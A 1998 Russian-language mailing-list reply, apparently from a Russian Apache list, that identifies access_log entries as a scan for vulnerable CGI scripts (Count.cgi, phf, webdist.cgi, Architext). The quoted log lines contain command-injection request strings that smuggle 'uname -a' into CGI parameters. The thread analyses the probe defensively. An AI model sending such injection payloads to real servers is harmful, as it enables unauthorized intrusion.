On Wed, 23 Dec 1998, Andrey V. Petrikov wrote:
> Обнаружил у себя в access_log следующее:
> 199.203.59.5 - - [08/Dec/1998:19:17:54 +0300] "GET /cgi-bin/Count.cgi HTTP/1.0" 200 360
В предпоследней версии Count.cgi был buffer overflow.
> 199.203.59.5 - - [08/Dec/1998:19:17:59 +0300] "GET /cgi-bin/webdist.cgi?distloc=;uname%20%2Da HTTP/1.0" 404 285
> 199.203.59.5 - - [08/Dec/1998:19:18:03 +0300] "GET /cgi-bin/phf?QAlias=x%0Auname%20%2Da HTTP/1.0" 404 277
Это древнаяя дырка в Apache...
> 199.203.59.5 - - [08/Dec/1998:19:18:10 +0300] "GET /cgi-bin/php.cgi? HTTP/1.0" 404 281
PHP - www.php.net. Особых дырок в последних версиях не помню.
> 199.203.59.5 - - [08/Dec/1998:19:18:13 +0300] "GET /cgi-bin/ews/ews/architext_query.pl HTTP/1.0" 404 300
Excite Architext - искалка от Excite, в дефолнтой установке дырява весьма.
Остальное не знаю.
> Из всех перечисленных cgi-шек есть только Count.cgi.
> Вопрос: не попытка ли это подлома?
Она, родимая.
--
frodo@sharat.co.il \/ There shall be counsels taken
Stanislav Malyshev /\ Stronger than Morgul-spells
phone +972-2-6245112 /\ JRRT LotR.
whois:!SM8333
"Russian Apache" includes software developed
by the Apache Group for use in the Apache HTTP server project
(http://www.apache.org/) See
Apache LICENSE.
Copyright (C) 1995-2001 The Apache Group. All rights reserved.
Copyright (C) 1996 Dm. Kryukov; Copyright (C)
1997-2009 . Design (C) 1998 Max Smolev.
